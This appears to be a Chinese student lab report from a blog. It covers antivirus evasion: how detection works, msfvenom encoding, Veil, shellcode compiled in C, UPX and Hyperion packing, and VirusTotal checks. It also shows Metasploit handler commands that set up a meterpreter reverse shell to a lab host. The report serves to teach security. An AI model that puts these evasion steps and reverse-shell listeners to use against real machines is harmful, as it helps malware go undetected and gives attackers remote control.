1.实验内容
本周学习
免杀:英文为 Anti-AntiVirus(简写Virus AV),逐字翻译为“反·反病毒”,翻译为“反杀毒技术”。一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
杀毒软件原理。
免杀处理:对生成的恶意代码进行免杀处理,加壳。
测试与验证:将处理后的恶意代码上传到病毒检测网站进行测试,查看其被杀毒软件检测的情况。
问题回答:
(1)杀软是如何检测出恶意代码的?
基于特征码的检测:杀毒软件的病毒库会记录一些恶意软件的特征码,这些特征码由不大于64字节的字符串组成,且是只有该病毒内才出现的字符串。当杀毒软件检测到程序时,会将程序与病毒库中的特征码进行比对,从而判断是否是恶意代码。
启发式恶意软件的检测:这种检测方式将一个软件与恶意软件的行为、代码等进行比对,如果发现相似度达到一定程度,即判定这个程序为恶意代码。不过,这种方式有一定的误报可能。
基于行为的恶意软件检测:该方式会对运行的所有进程进行实时监控,如果有敏感行为,就会被认为是恶意程序。这是一种动态的监测与捕捉方法。
(2)免杀是做什么?
免杀:英文为 Anti-AntiVirus(简写Virus AV),逐字翻译为“反·反病毒”,翻译为“反杀毒技术”。一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术(3)免杀的基本方法有哪些?
①修改特征码
②修改校验和
③花指令免杀
④加壳免杀
实践内容
(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
veil,加壳工具
使用C + shellcode编程
(2)通过组合应用各种技术实现恶意代码免杀
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。
(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
2.实验过程
(1)学习使用免杀工具msf编码器
①使用msf编码器,使用msfvenom生成后门程序,登录VirusTotal网站检测
②编码10次,登录VirusTotal网站检测
③生成jar文件,登录VirusTotal网站检测
④生成php文件,登录VirusTotal网站检测
⑤生成py文件,登录VirusTotal网站检测
(2)学习使用免杀工具Veil
①下载Veil
mkdir -p ~/.cache/wine cd ~/.cache/wine wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi sudo apt-get install libncurses5* sudo apt-get install libavutil55* sudo apt-get install gcc-mingw-w64* dpkg --add-architecture i386 sudo apt-get update sudo apt-get install wine32 apt-get install veil ——安装veil sudo su cd /usr/share/veil/config/ vim setup.sh
②完成安装后输入veil
②进入Evil—Evasion
③查看可使用的payload类型
④输入use 7
⑤生成可执行文件
⑥查看可执行文件
⑦将20222402veil.exe文件移入主机,使用VirusTotal进行检测
(3)使用C + shellcode编程
①生成一段shellcode
②新建一个.c文件,将shellcode和下图代码输入,并保存
③编译.c文件
④将20222402.exe文件移入主机,使用VirusTotal进行检测
(4)学习使用加壳工具
①upx加壳
②hyperion加壳
③将upx20222402.exe,upx20222402_1.exe文件移入主机,使用VirusTotal进行检测
(5)通过组合应用各种技术实现恶意代码免杀
①通过msfvenom生成Shellcode数组
②新建一个.c文件,将shellcode和下图代码输入,并保存
③编译
④加壳
⑤将文件传到主机,并打开杀毒软件
(6) 用另一电脑实测
电脑版本:windows11
杀毒软件:金山毒霸
①输入msfconsole进入控制台,依次输入:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.118
set LPORT 2402
exploit
②在主机端启动upx20222402_1.exe文件
③金山毒霸查杀结果
3.问题及解决方案
- 问题1:虚拟机生成的文件不能快速传输到主机,ncat有时会传输失败
- 问题1解决方案:使用Winscp,更方便地传输文件
- 问题2:在主机上的免杀测试失败
- 问题2解决方案:反复测试后未能找出原因
4.学习感悟、思考等
在这次关于免杀技术的实验中,我经历了一个从理论到实践、从陌生到熟悉的全面学习过程。
实验初期,我面对的是一系列陌生的工具和术语,如msf编码器、veil-evasion、加壳工具以及shellcode编程等。这些工具和技术虽然强大,但使用起来也颇具挑战性。在学习的过程中,我不断查阅文档、观看教程,甚至在一些技术论坛上寻求帮助。
在实验的过程中,我深刻体会到了免杀技术的复杂性和多变性。通过不断调整和优化代码、尝试不同的编码器和加壳工具,我逐渐掌握了如何通过多种技术手段的组合使用来提高恶意代码的抗检测能力。
通过本次实验,我深刻体会到了免杀技术的重要性和复杂性。免杀技术不仅需要对恶意代码进行深入的分析和理解,还需要掌握多种技术手段和工具。同时,免杀技术也是一个不断发展和变化的领域,需要不断学习和更新知识。
此外,免杀技术的发展也提醒我们,杀毒软件需要不断更新和升级,以应对日益复杂的恶意代码威胁。同时,我们也应该加强网络安全意识,提高自我保护能力,避免成为恶意代码的受害者。
参考资料
标签:免杀,加壳,检测,2024,2025,20222402,恶意代码,杀毒软件,VirusTotal From: https://www.cnblogs.com/nonosuperman/p/18517851